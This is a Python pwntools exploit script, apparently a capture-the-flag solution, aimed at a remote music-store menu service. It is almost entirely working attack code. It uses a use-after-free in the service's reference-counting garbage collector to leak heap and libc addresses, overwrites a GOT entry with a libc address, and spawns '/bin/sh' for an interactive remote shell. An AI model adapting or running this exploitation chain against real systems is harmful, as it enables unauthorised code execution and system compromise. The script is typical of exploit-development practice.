from pwn import *
'''
  Garbage Collector( Reference Counting ) Vulnerability - UAF
'''
s = remote('13.124.146.43',31337)
def reg_user(_id, _pw, _name):
  s.recvuntil('>')
  s.sendline("2")
  s.recvuntil('Type :')
  s.sendline('1')
  s.recvuntil('ID :')
  s.send(_id)
  s.recvuntil('PW :')
  s.send(_pw)
  s.recvuntil('Name :')
  s.send(_name)
def reg_composer(_id, _pw, _name, _profile):
  s.recvuntil('>')
  s.sendline("2")
  s.recvuntil('Type :')
  s.sendline('2')
  s.recvuntil('ID :')
  s.send(_id)
  s.recvuntil('PW :')
  s.send(_pw)
  s.recvuntil('Name :')
  s.send(_name)
  s.recvuntil('Profile :')
  s.send(_profile)
def login(_id, _pw):
  s.recvuntil('>')
  s.sendline('1')
  s.recvuntil('ID :')
  s.send(_id)
  s.recvuntil('PW :')
  s.send(_pw)
def write_music(_name, _lyrics):
  s.recvuntil('>')
  s.sendline('1')
  s.recvuntil('Name :')
  s.send(_name)
  s.recvuntil('Lyrics :')
  s.send(_lyrics)
def delete_music(_index):
  s.recvuntil('>')
  s.sendline('2')
  s.recvuntil('Index :')
  s.sendline(str(_index))
def edit_music( _index,_lyrics):
  s.recvuntil('>')
  s.sendline('4')
  s.recvuntil('Index :')
  s.sendline(str(_index))
  s.sendline(_lyrics)
def composer_out():
  s.recvuntil('>')
  s.sendline('5')
def user_out():
  s.recvuntil('>')
  s.sendline('9')
def make_box(_name):
  s.recvuntil('>')
  s.sendline('1')
  s.recvuntil('Name :')
  s.send(_name)
def delete_box(_index):
  s.recvuntil('>')
  s.sendline('2')
  s.recvuntil('Index :')
  s.sendline(str(_index))
def buy_music(_index):
  s.recvuntil('>')
  s.sendline('3')
  s.recvuntil('Index :')
  s.sendline(str(_index))
def put_in_box(_box,_music):
  s.recvuntil('>')
  s.sendline('4')
  s.recvuntil('box :')
  s.sendline(str(_box))
  s.recvuntil('>')
  s.sendline(str(_music))
def box_to_box(_dest,_src,x,y):
  s.recvuntil('>')
  s.sendline('5')
  s.recvuntil('index :')
  s.sendline(str(_dest))
  s.recvuntil('index :')
  s.sendline(str(_src))
  s.recvuntil('x :')
  s.sendline(str(x))
  s.recvuntil('y :')
  s.sendline(str(y))
def box_list():
  s.recvuntil('>')
  s.sendline('6')
def del_my_music(_index):
  s.recvuntil('>')
  s.sendline('8')
  s.recvuntil('Index :')
  s.sendline(str(_index))
s.recvuntil('>')
s.sendline('1')
s.sendline('1')
s.recvuntil('PW :')
s.sendline('1')
reg_user('AAAA\n','AAAA\n','AAAA\n')
reg_composer('BBBB\n','BBBB\n','BBBB\n','BBBB\n')
# Heap Leak
login('BBBB\n','BBBB\n')
write_music('1234\n','1234\n')
composer_out()
login('AAAA\n','AAAA\n')
make_box("1234\n")
buy_music(0)
put_in_box(0,0)
del_my_music(0)
user_out()
login('BBBB\n','BBBB\n')
delete_music(0)
composer_out()
login('AAAA\n','AAAA\n')
box_to_box(0,0,0,0) # Garbage Collector Vulnerability
make_box(p64(0x0607340)+'\n')
box_list()
heap = u64(s.recvuntil('Lyrics')[-7-4:-7]+'\x00'*4)
log.info("HEAP : 0x%x"%heap)
# Libc Leak
make_box('BBBB\n')
user_out()
login("BBBB\n",'BBBB\n')
write_music("PWND\n","PWND\n")
write_music(p64(0x605058)+"\n",'FAKE\n')
composer_out()
login('AAAA\n','AAAA\n')
buy_music(0)
put_in_box(2,0)
del_my_music(0)
user_out()
login("BBBB\n",'BBBB\n')
delete_music(0)
composer_out()
login('AAAA\n','AAAA\n')
box_to_box(2,2,0,0) # Garbage Collector Vulnerability
make_box(p64(heap+0x660)+'\n')
box_list()
libc = u64(s.recvuntil('\x7f')[-6:]+'\x00\x00') - 0x20740
log.info('LIBC : 0x%x',libc)
# GOT Overwrite
make_box("PWNING\n")
user_out()
login("BBBB\n",'BBBB\n')
write_music("PWND\n","PWND\n")
write_music("FAKE\n",'A'*8+p64(0x605078)+'\n')
composer_out()
login('AAAA\n','AAAA\n')
buy_music(0)
put_in_box(4,0)
del_my_music(0)
user_out()
login("BBBB\n",'BBBB\n')
delete_music(0)
composer_out()
login('AAAA\n','AAAA\n')
box_to_box(4,4,0,0) # Garbage Collector Vulnerability 
make_box(p64(heap+0xc10)+'\n')
user_out()
login('BBBB\n','BBBB\n')
write_music('GOOD\n','ZZZZ\n')
composer_out()
login('AAAA\n','AAAA\n')
delete_box(4)
make_box(p64(0xdeadbeef)+'\n')
user_out()
reg_user('1234\n','1234\n',p64(heap+0xa08)+'\n')
login('BBBB\n','BBBB\n')
edit_music(0,p64(libc+0x45390)[:-2])
write_music('/bin/sh\n','/bin/sh\n')
s.interactive()
